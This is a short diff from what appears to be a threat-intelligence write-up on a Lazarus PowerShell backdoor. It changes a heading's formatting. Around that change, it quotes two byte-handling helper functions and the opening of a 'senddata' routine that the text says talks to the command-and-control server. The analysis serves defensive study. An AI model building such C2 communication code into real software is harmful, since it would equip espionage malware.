StrangerealIntel/CyberThreatIntel/North Korea/APT/Lazarus/23-10-19/analysis.md

 function ConverttoInt32($buffer,$Offset){ return [System.BitConverter]::ToInt32($buffer,$Offset) }
 function Get_UTF8Bytes($Data){ return [System.Text.ASCIIEncoding]::UTF8.GetBytes($Data) }
 ```
-###### The following functions are for send and get the data from the C2.
-We can note that the user agent is the same that the MacOS backdoor.
+<h6> The following functions are for send and get the data from the C2.
+We can note that the user agent is the same that the MacOS backdoor.</h6>
 ``` powershell
 function senddata($tid,$rid,$array_data,$DatatoC2_Length,$url)
 {